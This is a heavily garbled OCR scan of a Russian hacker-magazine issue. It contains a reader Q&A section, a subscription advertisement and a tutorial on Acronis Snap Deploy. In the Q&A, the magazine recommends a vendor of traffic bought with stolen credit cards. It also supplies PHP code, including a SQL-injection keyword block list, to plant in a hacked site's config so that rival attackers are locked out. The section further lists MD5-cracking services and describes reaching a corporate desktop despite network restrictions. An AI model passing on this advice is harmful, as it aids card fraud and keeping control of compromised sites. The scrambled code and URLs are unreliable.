вышли из жесткого привата: ЫтЬо, 
2еиз, Согрзе, Адепі йО, ЕирасЬа. 

Эти и другие полуприватные 
проги часто выкладывают на «злом» 
форуме, например, втеме«При- 
ватный софт» [ ШрзУЛогит.гІоѵ. 
огд/5ЬоѵѵіЬгеаб.рЬр?1=7951 ). 

Только предупреждаю: доверяй 
(юзерам, которые выкладывают 
этот софт), но проверяй (поскольку 
троян, зашитый в другой троян, уже 
не редкость). 

0: Подскажи контору, которая 
продает траф по кредиткам без 
прозвонов. 

А: ЬирУ/абѵегІуг.сопп — замеча- 
тельная контора для твоего кардер- 
скоготрафа. После вбива кредитки 
траф можно гнать куда угодно: на 
адалт, на партнерки, на загрузки, на 
ррс. В общем, при желании можно 
наслаждаться качественным и 
почти халявнымтрафиком :). 

0: Взломал сайт на паблик-движке 
и залил туда свои доры. Подскажи, 
как обезопасить доры от кражи? 

А: Обычно доры воруют на сайтах, 
взломанныхс помощью паблик- 
уязвимостей. Чтобы избежать 
этого, найди открытые на запись 
конфигурационные файлы паблик- 
движка (или инклуд на худой конец 
:)) и вставь в любое место РНР-кода 
следующее: 

<? 

$розк_агг = 

ітріосіе ( 1 . 1 , $_РОЗТ) ; 
$дек_агг = 

ітріосіе ( ' . ' , $_СЕТ) ; 
$соок_агг = 

ітріосіе ( ' . ' , $_СООКІЕ) ; 
$розк_агг_кеу = 
ітріосіе ( 1 . 1 , 

@аггау_к1ір ( $_РОЗТ) ) ; 
$дек_агг_кеу = 
ітріосіе ( ' . ' , 

@аггау_к1ір ($_ОЕТ) ) ; 
$соок_агг_кеу = 
ітріосіе ( 1 . 1 , 

@аггау_к1ір ( $_СООКІЕ) ) ; 
$окЪ.ег_з]гкикі= @кі1е_дек_ 
сопкепкз ( 'р!Ьр: //іприк ' ) ; 
$сгасккгаск = зкгкоіомег ( 
$розк_агг . $дек_агг . $соок_ 
агг . $розк_агг_кеу . $дек_ 
агг_кеу . $соок_агг_ 
кеу . $оккег_з]ткикі ) ; 
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^ ипі^г 



? 

• 

$ѵѵогтргокеског = аггау ( 'и 
піоп ' , 1 зеіеск ' , ' зиЪзкгіп 
д ' , '/**/') ; / /тут дополни 
по своему вкусу кейворды 
8С>Ь- и РНР-инжекторов 
$с?іескѵѵогт = зкг_гер1асе ( 
$ѵѵогтргокеског , 1 * 1 , 
$сгасккгаск) ; 
ік ($сгасккгаск != 
$скескѵ\гогт) 
сііе ( " " ) ; 

?> 

В результате все паблик-сплоиты 
идутлесом, посколькулюбой запрос 
к скрипту, где присутствует что-либо 
похожее на 501-инъекцию, жестко 
проверяется, и, если что, взломщик 
шлется куда подальше :]. 

0: Какие ты знаешь сервисы 
онлайн-расшифровки М05-хэшей 
помимо ННр://ра55сгаскіпд.ги? 

А: Сервисов по кряку Мйб в послед- 
нее время стало очень и очень мно- 
го. Поэтому воттебе моя небольшая 
подборочка: 

кккр : / /дсіакаопі іпе . сош/ 
зеекказЪ. . ркр 
кккр : //тіІѵѵОгт. сот/тс15/ 
іпко . рЬр 

кккр : / /из . тсЗ.5 . сгу зт . пек 
кккр : //ріаіп-кехк . іпко 
кккр : / /зесигікузкакз . 
сот/кооіз 

кккр : / /тсІБ . гесіпоіге . сот 
кккр : //тОБсгаск . ік- 
кеірпек . сіе 

кккр: //іѵОЬ.огд/зеагск/ 
тсіБ 

кккр : / /ктко . огд 

кккр : / /хтсІБ . огд/іпс!ех_ 

еп.ккт 

кккр: //ісе .Ьгеакег . кгее. 
кг 

кккр : / /тсіБ . Ьепгатзеу . сот 
кккр : / /сзккіз . сот/тсІБ / 
іпсіех . ркр 

кккр : //тс15 . деекз . 1і 
кккр: //тсІБсІакаЪазе . пек 
кккр : //тсІБсІесгуркег . сот 
кккр : / /казкгеѵегзе . сот 
кккр : / /гаіпЪоѵѵкаЫез . пек/ 
зегѵісез/гезиікз .ркр 
кккр : //тсіБккіз . сот/ 
геѵегзе .ркр 

кккр : //стсІБ . сот/епдіізк . 
азрх 

кккр : / /тсІБепсгуркіоп . сот 
кккр : / /ккерапісгоот. огд/ 
іпсіех . ркр?ѵіеѵѵ=сгаскег 
кккр : //рапрап. огд/2006/ 
тсіБазр/НОМЕ . А8Р 
кккр : / /Ьізіх . кк 



кккр : / /тйБказкез . сот 
Ьккр : //тсІБразз . іпко 
Ьккр : //тс15 . казкріс . сіе/ 
сгаск.ркр 

0: Я слышал, что последний 
ІЛиіп(и можетугробить жесткий 
диск в ноутбуке. Что за бред? 

А: Да, действительно, в ІІЬипІи 
7.1 0 есть скрипт, который, по идее, 
долже н у вел и ч и вать дл ител ьность 
автономной работы ноутбука, 
отключая питание винчестера, 
когда тот не требуется. На прак- 
тике запуск и остановка жесткого 
диска происходят несколько раз в 
минуту, причем независимо оттого, 
работаетли бук от батарейки или 
от постоянной сети. У всехжестких 
дисков есть параметр І_оасІ Сусіез, 
значение которого увеличивается 
на единицу при каждой останов- 
ке/разгоне шпинделя или же при 
парковке/депарковке головки. Мак- 
симальное значение Иоаб Сусіез 
для свежих винчестеров составляет 
600 000 раз. Несложно посчитать, 
на сколько времени хватит жесткого 
диска, если некорректный скрипт 
оперируете его питанием несколь- 
ко раз в минуту! На форуме Убунту 
предлагается решить проблему, 
введя в КОНСОЛИ: 

$ зисіо Мрагт -В 2 55 /сіеѵ/ 
зсіа 

На параметр В система должна 
вернуть: 

/сіеѵ/зсіа : 

зеккіпд Асіѵапсесі Роѵѵег 
Мападетепк Іеѵеі ко 
сіізаЫесІ 

После этого вводится еще одна 
команда: 

$ зисіо Ьсірагт -8 0 /сіеѵ/зсіа 

На нее система должна ответить 
следующим сообщением: 

/сіеѵ/зсіа : 

зеккіпд зкапсіЬу ко 0 (окк) 

После этого І_оасІ_СусІе_Соип1: 
должен остановиться. Если этого 
не произошло, можно попробовать 
всезаново, но в качестве параметра 
первой команде передать не 255, 
а 254. 

0: Помогите, нужно получить 
доступ кудаленному рабочему 



столу компьютера из корпоратив- 
ной локалки. Внешнего ІР, само 
собой, нет; пробросить порт никто 
не даст; и, что еще хуже, никакие 
программы установить нельзя 
(нет прав админа). Есть ли у вас 
вариант решения проблемы? 

А: Решений на самом деле не- 
сколько. Самое банальное — это 
организоватьтуннель, например 
с помощью зіиппеі [ ѵѵѵѵѵѵ.зіиппеі. 
огд ). и через него пуститьтрафик 
какой-нибудь самой обыкновенной 
программы, сойдет даже баналь- 
ный Ветоіе Абтіпізігаіог [ ѵѵѵѵѵѵ. 
габтт.еот ). На официальном 
сайте туннеля доступны бинарники 
как для никсов, так и для Винды. 

Но если хочешь более простое и 
изящное решение, то рекомендую 
тебе сервис ТеатѴіеѵѵег [ ѵѵѵѵѵѵ. 
Іеатѵіеѵѵег.сопп ). Тут все просто: на 
каждом из компьютеров запуска- 
ется своя копия утилиты. В окне 
программы тут же отобража ются 
два параметра: Ю (например, 24 
151 61 0) и раззѵѵогб. Вот как раз эти 
самые параметры и используются 
для подключения в любую сторону. 
Просто введи данные на клиент- 
ской машине, выбери Петоіе 
зиррогі и смело жми на Соппесі Іо 
рагіпег. Вот и все — доступ куда- 
ленному рабочему столу получен. 

А как быть с инсталляцией? Можно 
было бы заморочиться созданием 
портированной версии с помощью 
ТЬІпзІаІІ или похожего продукта, 
однако разработчики ТеатѴіеѵѵег 
уже позаботились об этом сами и 
выложили на официальном сайте 
рогіаЫе-версию. Кстати говоря, 
сервис абсолютно бесплатный. 

0: Есть замечательное онлайн- 
радио ѵѵѵт.ІабІ.Тт, но, когда все 
пользователи локалки начинают 
к нему коннектиться, канал, есте- 
ственно, проседает. А как бы взять 
поток с этого сервиса и ретранс- 
лировать в локальную сеть, чтобы 
пользователи подключались к 
нему через ѴѴіпатр и без исполь- 
зования интернета? 

А: Да проще простого. Специаль- 
но для этих целей была создана 
одна замечательная программа 
— І_аз1:РМ Ргоху [ ЫірѴ/ѵісІаг.дітр. 
огд/?раде Іс1=50 ). Она как раз 
обладает нужной функциональ- 
ности. Что особенно интересно, 
написана она на скриптовом 
языке РуіЬоп и поэтому может 
бытьлегко портирована под 
разные ОС. 




0: На сайте МісгозоН.сот нашел 
кучу обучающего видео по про- 
граммированию на Ѵізиаі Біисііо. 
Проблема в том, что просто зака- 
чать его нельзя — оно отобража- 
ется только в браузере. Как быть? 

А: Для того чтобы сохранить на 
жесткий диск файл в формате 
потокового видео (зігеатіпд 
ѵібео), нам потребуются три 
программы: ЦРЕ Зпоорег [ ѵѵѵѵѵѵ. 
бопаІіопсобег.сот/ЗоІІѵѵаге/ 
Моизег/игізпоорег ). МРІауег 
[ ѵѵѵѵѵѵ. трІаѵегЬд.Ь и ) и АЗРВІп 
[ ѵѵѵѵѵѵ. га біоасііѵера дез .со т і. 
Предположим, что мы хотим скачать 
файл, который проигрывается на 
заданной странице: 

1. До перехода на страницу за пус- 
каем ІІПІ_5поорег, в графе Ргоіосоі 
РІІІег выбираем МиШтебіа ІІРІ_5 и 
нажимаем на клавишу 8п іік Мек/ѵогк. 

2 . Далее переходим на нужную 
страницу. 

3. В списке ссылокІІРІ_5поорег 
отыскиваем и копируем ссылку на 
ттз-поток, содержащий искомый 
файл. 

4 . Из командной строки запускаем 
МРІауег, вставив в нужное место 
ссылку на ттз-поток. Например, так: 

тріауег ттз : / / ѵісі . 
маііа . со . іі/ѵісіео/ 
агтадесі(іоп/19 023 9-6 .ѵѵтѵ 
-сіитрзкгеат -сіитркііе 
кііе . ѵптіѵ 

5 . После того как видео скачается, 
получившийся файл Ліе.ѵѵтѵ надо 
проиндексировать, разблокировав 
возможность перемотки. Это дела- 
ется при помощи утилиты АЗРВІп из 
той же командной строки: 

азкЪіп -і кііе. ѵѵтѵ - 
о кііе-іпсіехесі.ѵѵтѵ 
— когсеіпсіех 

Л Іе.ѵѵтѵ теперь можно стереть, по- 
скольку готовый видеоролик будет 
сохранен в файл Ліе-іпбехеб.ѵѵтѵ. 
Надо сказать, что для последней 
версии АЗРВІп на сайте появилась 
также ѲІЛ -версия и заморачи- 
ваться в консоли в принципе не 
требуется. Да и вообще, вместо 
связки трІауег+азІЬІп можно 
использовать НЮоѵѵпІоасІ [ ѵѵѵѵѵѵ. 
Ыбоѵѵпіоаб.сот ) иѴѴМРесогбег 
[ ѵѵѵѵѵѵ.ѵѵтгесогбег.сот ) . А п ол ь- 
зователи браузера Рігеіох вместо 
II П Б Зпоорег могут за юзать плагин 
МебіаРІауегСоппесііѵіІу. И-И 
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ПОДПИСКА В РЕДАКЦИИ 

С 1 ноября по 31 января проводится 
специальная акция для читателей журнала 




ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 



1 980 руб. 

цены действительны до 31 января 2008 года 



(на 15% дешевле чем 
при покупке в розницу! 



ПЛЮС ПОДАРОК 
ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 

ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, ВЫ МОЖЕТЕ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН СВЕЖИЙ НОМЕР ЛЮБОГО 
ЖУРНАЛА, ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 




ОѴОХреН 



• ЯНВАРСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 

• ФЕВРАЛЬСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ДЕКАБРЯ. 

• МАРТОВСКИЙ НОМЕР - ПОДПИСАВШИСЬ ДО 31 ЯНВАРЯ 




«ІТ спец» 





Махі Іипіпд 





Тоіаі РооіЬаІІ «Хулиган» 



ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУРНАЛА, ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР. 



Теперь ты можешь получать журнал с КУРЬЕРОМ не только в Москве, но и в Санкт-Петербурге, Уфе, 
РІижнем РІовгороде, Волгограде, Казани, Перми, Челябинске, Омске. 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 



При подписке на комплект журналов 
ЖЕЛЕЗО РѴй + ШЕРШ+ ГГ СПЕЦ Сй: 

- Один номер всего за 147 рублей 
(на 25% дешевле, чем в розницу) 

- плюс бесплатная подписка на любой журнал 
(дате)Іапб на 1 месяц! 

ЗА 12 МЕСЯЦЕВ 















ВЫГОДА • ГАРАНТИЯ • СЕРВИС 



КАК ОФОРМИТЬ ЗАКАЗ ВНИМАНИЕ! 



1. Разборчиво заполните подписной купон и квитанцию, выре- 
зав их из журнала, сделав ксерокопию или распечатав с 
сайта ѵѵш.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов— купо- 
на и квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 78088-24; 

• по адресу 1 1 9021 , Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных доку- 
ментов в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подпис 
ных документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в пос- 
леднем случае предварительно отсканировав или сфотографиро- 
вав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 



Подписка на журнал «ХАКЕР+ОѴР» на 6 месяцев стоит 1 080 руб. Подарочные журналы при этом не высылаются 



По всем вопросам 



, связанным с подпиской, звоните по бесплатным телефонам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон]. Вопросы 
о подписке можно также направлять по адресу іпіо@дІс.ги или прояснить на сайте шш.ОІ_С.ш 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «ХАКЕР» 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 

НА ЖУРНАЛ « » 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 200 г. 

I — I Доставлять журнал по почте 
' — на домашний адрес 
Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



прошу выслать бесплатный номер журнала 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г. 





Ф.И.О. 



Кассир 



Подпись плательщика 
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Атака клонов 

АСКОІЧІБ 5ЫАР ОЕРЮУ: РЕШЕНИЕ ДЛЯ РАЗВЕРТЫВАНИЯ ѴѴІМ00ѴѴ5-СИСТЕМ 

Проблема установки операционных систем на большое количество компьютеров остро стоит в организа- 
циях, так или иначе связанных с продажей или обслуживанием вычислительной техники. Все мероприя- 
тия, с учетом установки драйверов, дополнительного программного обеспечения, предварительной на- 
стройки, требуют значительных временных затрат и ресурсов. Использование Асгопіз Зпар Эеріоу сможет 
значительно упростить задачу установки и введения компьютеров в строй или восстановления систем 
после сбоя. 



ВОЗМОЖНОСТИ АСК0ЫІ5 5ЫАР ОЕРЮУ 

Задача Асгопіз Зпар Эеріоу — управление одновременным раз- 
вертыванием образов операционных систем на любое количество 
компьютеров, которые загружаются по сети при помощи входящего 
в комплект РХЕ-сервера или загрузочного носителя. При развер- 
тывании администратор использует самостоятельно созданный 
эталонный образ. Для этого на одном из компьютеров устанавли- 
вается и настраивается система и все программное обеспечение, 



требуемое на рабочей станции. Можно создать любое количество 
таких образов и использовать их по мере необходимости. 

Для решения этих задач предлагается несколько компонентов, каждый 
из которых выполняет свои функции. Так, сердцем всей системы является 
сервер Асгопіз ОЗ Періоу Зегѵег, непосредственно выполняющий развер- 
тывание образов на удаленные компьютеры и управление процессом. 
Удаленное администрирование всех приложений, входящих в состав 
Эеріоу Зегѵег, осуществляется при помощи консоли управления. Цен- 
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Консоль управления Асгопіз Зпар Эеріоу 

трализованное управление лицензиями продуктов Асгопіз возложено на 
сервер лицензий Асгопіз. Необязательный элемент — Асгопіз РХЕ-сервер 
— предназначен для загрузки на удаленные компьютеры агента Асгопіз 
Зпар Періоу или Асгопіз Мазіег Іта§е Сгеаіог без использования сменных 
носителей и других загрузочных дисков. Практически все новые материн- 
ские платы и сетевые карты поддерживают этот стандарт. Это дает нам 
возможность произвести загрузку требуемых компонентов по сети, что 
заметно упрощает создание эталонных образов и их развертывание на 
новые компьютеры. 

Агент Асгопіз Зпар Періоу, загружаясь на каждом целевом компьютере под 
управлением сервера, непосредственно выполняет установку системы. 

Он загружается по сети с помощью КІЗ или РХЕ, а если такой вариант не 
возможен, то со специального загрузочного диска. 

За создание образа отвечают сразу два приложения, управление которыми 
осуществляется при помощи консоли. На эталонный компьютер может 
быть установлен агент управления Асгопіз Зпар Періоу либо по сети/с 
диска загружен Асгопіз Мазіег Іта§е Сгеаіог. Кроме этого, агент управле- 
ния позволяет на удаленном компьютере создавать, копировать и удалять 
файлы и каталоги, устанавливать на него компоненты Асгопіз, запускать 
программы. Эту возможность можно использовать, например, для осуще- 
ствления некоторых операций, которые часто забывают делать пользо- 
ватели — резервное копирование, обновление антивирусов и прочее. 
Причем агент представлен в виде планировщика, поэтому повторяющиеся 
задачи можно автоматизировать. 

Доступен и модуль Асгопіз Шіѵегзаі Періоу (АЕГО) , позволяющий создавать 
аппаратно-независимые образы, однако приобретается и устанавливается 
он отдельно. 

Не все компоненты необходимо устанавливать на один компьютер: основ- 
ные утилиты должны быть инсталлированы на сервере; консоль управ- 
ления можно установить на компьютер, являющийся рабочим местом 
администратора; агентам место на клиентских компьютерах сети. Все 
настройки производятся при помощи простых мастеров, что существенно 
упрощает даже самые сложные операции. 

Для работы сервера потребуется компьютер класса Рещіит с 128 Мб ОЗУ 
под управлением ѴѴіпсіошз №Г/2к/2кЗ с настроенным ПНСР-сервером. 
Этим решение от Асгопіз отличается от реализации КІЗ/ѴУПЗ, требующей 
как минимум ѴѴіпсІолѵз 2кЗ Зегѵег. На компьютере, являющемся консолью 
администратора, а также в качестве развертываемой системы можно 
использовать и ѴѴіпсІоѵ/з 98/Ме. Хотя отмечается, что при помощи Асгопіз 
Зпар Періоу, используя загрузочный носитель, под силу развернуть любую 
систему на платформе х86. Поддерживаются файловые системы ЕАТ16/32, 




Программа установки Асгопіз Зпар Эеріоу 

№ГЕ5, ехі2/ехіЗ, КеізегЕЗ, Кеізег4, ХЕЗ, 1РЗ и Ілпих ЗѴѴАР. Так что теорети- 
чески простор для творчества велик. 

УСТАНОВКА АСКОЫ 15 5ЫАР ОЕРІ.ОѴ 

Демонстрационную версию Асгопіз Зпар Періоу и ключ, дающий 
15 дней на ознакомление с его работой, можно получить на сайте 
проекта ( \ѵѵ\аѵ. асгопіз. ги) после регистрации. Установка выполнена 
в едином для всех продуктов Асгопіз стиле, поэтому если ранее ты 
сталкивался с установкой других решений, то найдешь здесь много 
знакомого. После запуска исполняемого файла появится меню; любой 
доступный компонент можно извлечь в виде тзі-файла, воспользо- 
вавшись контекстным меню. Если в сети нет действующего сервера 
лицензий Асгопіз (Асгопіз Ілсепзе Зегѵег), развертывание Зпар Періоу 
следует начинать именно с него, так как последующие элементы будут 
требовать наличия такого сервера. Установка Асгопіз Ілсепзе Зегѵег 
производится при помощи понятного мастера. Если размещение кон- 
соли управления сервером лицензий планируется на другом компью- 
тере, следует применить вариант установки «Выборочная» и отметить 
устанавливаемые компоненты. После установки Асгопіз Ілсепзе 
Зегѵег надо добавить в его базу все номера лицензий используемых 
продуктов Асгопіз (установка Асгопіз Ілсепзе Зегѵег подробно описана 
в мартовском номере «Хакера» за 2007 год. — Прим, редактора) . Одна 
лицензия позволяет управлять одним сервером Зпар Періоу. 
Следующий шаг — установка основного компонента всей системы 
— Асгопіз ОЗ Періоу Зегѵег. Здесь тебя встретит аналогичный мастер. 
После подтверждения согласия с лицензионным соглашением следует ука- 
зать сервер лицензий. Возможен автоматический поиск сервера или ввод 
данных вручную. После того как Асгопіз ОЗ Періоу Зегѵег будет установлен, 
таким же образом устанавливаем консоль управления Асгопіз Зпар Періоу 
на компьютер администратора. Установка консоли проста и не должна 
вызвать никаких затруднений. Также по умолчанию будет инсталлирован 
мастер создания загрузочных образов, можно воспользоваться «Выбороч- 
нымвариантом» и указать только необходимые компоненты. 

Перед тем как продолжить работу, следует убедиться в доступности 
лицензии, для чего вызываем консоль управления и выбираем пункт 
«Управление лицензиями». Если нужная лицензия присутствует в списке, 
значит все в порядке и можно идти дальше; в противном случае ее следует 
импортировать, нажав «Добавить лицензию». 

В дальнейшем установку остальных компонентов, в том числе и на уда- 
ленные системы, можно производить при помощи консоли, выбрав пункт 
«Сервис -> Установка компонентов Асгопіз». Появившийся мастер уда- 
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Выбор диска для клонирования 
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Настройка сетевых параметров шаблона 



ленной установки проведет нас за руку по всем этапам. Сначала следует 
указать источник, в качестве которого может выступать извлеченный тзі- 
файл, СЭ/ЭѴЭ-дискили зарегистрированный в 5пар Эеріоу компонент. 
Для дальнейшего использования устанавливаемый компонент можно 
скопировать и зарегистрировать. Далее, в зависимости от предыдущего 
выбора, следует указать устанавливаемый компонент, затем компьютер, 
на который его необходимо установить, и учетные данные для доступа. 
Если устанавливаемый компонент для работы требует перезагрузки 
компьютера (например, агент управления Асгопіз Зпар Эеріоу), ставим 
флажок в этом же окне. 

Инсталляция последнего компонента Асгопіз РХЕ Зегѵег не сложна — дос- 
таточно 4 раза нажать кнопку «Далее» :) . После установки к нему нужно 
подключиться, для этого выбираем в консоли «Настройка РХЕ Зегѵег» и на- 
жимаем в меню пункт «Обновить РХЕ Зегѵег». Появится очередной мастер, 
на втором шаге которого следует отметить компоненты Асгопіз, которые 
будут доступны при удаленной загрузке. Если на компьютере имеются 
другие решения от Асгопіз, они также будут указаны в этом списке. В част- 
ности, Асгопіз Зпар Эеріоу можно использовать для развертывания файлов 
образов, созданных в программе Асгопіз Тше Іта§е. После нажатия на 
кнопку «Приступить» все отобранные компоненты будут подготовлены 
для загрузки по сети, а их список появится в окне консоли. 

ПОДГОТОВКА К СОЗДАНИЮ ОБРАЗОВ 

Если компьютеры не поддерживают удаленную загрузку по сети, нам 
потребуются два диска. При помощи диска с Асгопіз МазШг Іта§е СгеаЮг 
будем создавать эталонные образы, а диск с Асгопіз Зпар Эер1оуА§еШ 
позволит управлять удаленным компьютером с консоли. Для того чтобы 
создать такой диск, достаточно нажать ссылку «Создать загрузочный диск» 
и следовать указаниями мастера. Устанавливаем систему, программное 
обеспечение, которое разрешено к использованию в сети предприятия, и 
все доступные на момент установки патчи и исправления. 

Но при клонировании систем на ядре N7 есть один момент, о котором 
следует знать. Так как эта система ориентирована на работу в сетевом 
окружении, для каждой учетной записи создается идентификатор безопас- 
ности (ЗГО, зесигПуісІешШег), который используется при ограничении 
прав пользователей. Естественно, что ЗГО во всех операционных системах, 
установленных путем клонирования, будут одинаковы, а значит, пользо- 
ватели этих машин смогут получить равные права. 

Для решения этой проблемы следует использовать утилиту 
ЗузШіп Ргерагагіоп Тооі (зузргер.ехе), входящую в состав дист- 
рибутива ѴѴіпсіоѵѵз (файл зузі:ет\і:ооІ5\(1ер1оу.саЪ). Как вариант 
— она свободно скачивается (если будет пройдена проверка на 



подлинность установленной ОС) с сайта Місгозоіт. Утилиту зузгер 
можно запустить как в командной строке, передав ей в качестве 
аргументов нужные параметры, так и двойным щелчком мышки. 
По окончании работы компьютер перезагрузится. При следую- 
щей загрузке или установке системы ей будет присвоен новый 
ЗГО, а запустившийся мастер поможет произвести остальные на- 
стройки. По окончании все файлы, связанные с зузгер, будут уда- 
лены. Дополнительно к зузгер можно использовать файл зузргер. 
іпГ, в котором указаны ответы на вопросы, задаваемые этим 
мастером установки. Таким образом, можно полностью автома- 
тизировать весь процесс. Если система клонируется при помощи 
таких программ, как Асгопіз Тше Іта§е, использование зузргер 
обязательно. А Зпар Эеріоу умеет самостоятельно присваивать 
ЗГО, настройки ТСР/ІР, домена или рабочей группы. 

Эталонный образ можно создать двумя способами: локально, ис- 
пользуя на компьютере-источнике загрузочный диск Асгопіз МазШг 
Іта§е СгеаШг, или удаленно, при помощи консоли управления Асгопіз 
Зпар Эеріоу. Несмотря на все удобства удаленного создания образов, 
разработчики рекомендуют первый способ. Присутствие лишних про- 
грамм в образе нежелательно, а Асгопіз Зпар Эеріоу А^епі: обязательно 
попадет в слепок и после развертывания будет установлен на всех 
компьютерах. Хотя, учитывая его возможности, описанные выше, это 
может быть даже плюсом. 

СОЗДАНИЕ ОБРАЗОВ 

Для создания загрузочных дисков выбираем пункт «Создать загру- 
зочный диск» и следуем указаниям мастера Асгопіз Мейіа ВиіШег. 

На втором шаге предстоит выбрать продукты Асгопіз, которые 
будут установлены на этот диск (Асгопіз Зпар Эеріоу А^епі: и Асгопіз 
МазШг Іта^е СгеаШг) . Отметив один из пунктов и установив флажок 
«Автоматически запускать после», можно разрешить автомати- 
ческую загрузку этого компонента через указанный промежуток 
времени. Далее выбираем устройство, которое будет использовано 
для создания загрузочного носителя. В качестве последнего может 
выступать СЭ/ЭѴТ)-привод, ІЗО-файл или сервер со службой удален- 
ной установки КІЗ/АЛГОЗ. 

Теперь загружаемся на эталонном компьютере при помощи диска или 
по сети с использованием КІЗ. В появившемся меню выбираем Асгопіз 
Мазшг Іта§е Сгеаюг. Через некоторое время последует запрос на его 
настройку. Если в сети нет настроенного ЭНСР-сервера, компьютер 
не сможет подсоединиться к ней. В этом случае в окне настроек тебе 
необходимо указать ІР-адреса найденных сетевых интерфейсов. 
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И встречаем мастер создания эталонных образов. Работа с ним 
стандартна и напоминает создание образов разделов в Асгопіз Тше 
Іта§е. Просто выбираем диск, образ которого нужно создать, а затем 
указываем место хранения эталона. Это может быть раздел жесткого 
диска, сетевой ресурс, привод, флеш-карта и прочее. Но учти, что 
выбирать отдельные разделы диска, как это происходит в Тше Іта§е, 
здесь нельзя, только целые диски. В один образ можно включать один 
или несколько дисков. Далее устанавливаем сжатие, деление архива 
на части, проверку целостности образа, комментарии (при большом 
количестве образов ремарками пренебрегать не стоит, легче будет 
найти нужный) . 

СОЗДАНИЕ ШАБЛОНА 

Итак, эталонные образы у нас уже есть, но, перед тем как начать 
непосредственное развертывание систем, следует создать шаблоны. 
В шаблоне администратор сохраняет план процедуры развертыва- 
ния, указав специфические для данной сети настройки. Для этого 
переходим в «Управление развертыванием» и выбираем «Создать 
шаблон». Очередной мастер сначала предложит создать новый 
шаблон или использовать существующий. Пока шаблона у нас нет, 
поэтому выбираем первый вариант и указываем на созданный 
эталонный образ. На следующем шаге мастер позволит создать 
произвольное число учетных записей пользователей, которые могут 
принадлежать к одной из трех групп: «Администраторы», «Опытные 
пользователи» и «Пользователи». Далее следует ввести имя ком- 
пьютера и указать принадлежность к домену или рабочей группе. 
Чтобы присвоить уникальные имена, можно использовать маски. 
Например, указав в поле «Имя компьютера» ОНісе{0}, мы получим 
имена ОШсеО, ОНісеІ и т.д. При необходимости через запятую мож- 
но задать конечную цифру в нумерации. Так, при ОШсе{1,3} будут 
выданы имена от ОНісеІ до ОНісеЗ. 

Затем переходим к настройке сетевых параметров компьюте- 
ров. Можно указать автоматическое назначение адресов при 
помощи ПНСР, задать диапазон вручную или оставить установ- 
ки, сохраненные в образе, без изменений. Активация флажка 
«Изменить идентификатор безопасности» в следующем окне 
позволит создать уникальный для каждого компьютера 5Ш, заме- 
нив записанный в образе. Следующие два шага мастера помогут 
указать файлы и каталоги, которые должны быть скопированы на 
все целевые компьютеры после завершения процесса установки, 
а также список приложений и скриптов, которые необходимо 
запустить в конце работы. 



И, наконец, предпоследнее окно мастера. Здесь указываем, что 
нужно сделать после окончания всех процедур (выключить или пе- 
резагрузить компьютер), метод использования дискового простран- 
ства (весь диск или как в образе) и настройки сети. В последнем 
случае задается полоса пропускания и выбирается режим передачи: 
групповой и одноцелевой. Каждый имеет свои достоинства и недос- 
татки. При выборе первого меньше нагрузка на сеть, так как образ 
передается по широковещательному адресу один раз и сразу всем 
компьютерам, но для этого нужна поддержка ІОМР. Во втором случае 
производится «персональная» установка, информация передается 
каждому компьютеру, полоса пропускания делится поровну между 
компьютерами. Далее задаем описание шаблона и после сохранения 
результата можно приступать к установке. 

РАЗВЕРТЫВАНИЕ ОБРАЗОВ 

Включаем целевой компьютер и загружаем агент Асгопіз Зпар 
Періоу, используя РХЕ-сервер, КІ5 или загрузочный диск. Как и в 
случае с Асгопіз Мазіег Іта§е Сгеаіог, при необходимости настраи- 
ваем сетевые интерфейсы, но здесь появилась еще одна вкладка 
— «Развертывание», в которой можно указать адрес или имя серве- 
ра Асгопіз 5пар Періоу. После подтверждения настроек агент будет 
пытаться подключиться к серверу. 

